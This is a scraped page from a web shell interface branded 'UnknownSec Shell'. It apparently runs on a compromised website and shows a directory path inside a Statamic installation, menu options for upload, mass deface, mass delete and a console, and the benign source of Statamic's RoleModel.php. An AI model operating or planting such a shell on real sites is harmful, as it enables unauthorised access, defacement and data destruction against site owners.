shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Auth
/
Eloquent
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
RoleModel.php
<?php namespace Statamic\Auth\Eloquent; use Illuminate\Database\Eloquent\Model as Eloquent; class RoleModel extends Eloquent { protected $guarded = []; protected $table = 'roles'; protected $casts = [ 'permissions' => 'json', 'preferences' => 'json', 'created_at' => 'datetime', 'updated_at' => 'datetime', ]; public function __construct(array $attributes = []) { parent::__construct($attributes); if ($table = config('statamic.users.tables.roles')) { $this->setTable($table); } $this->setConnection(config('statamic.users.database')); } }
© 2026 UnknownSec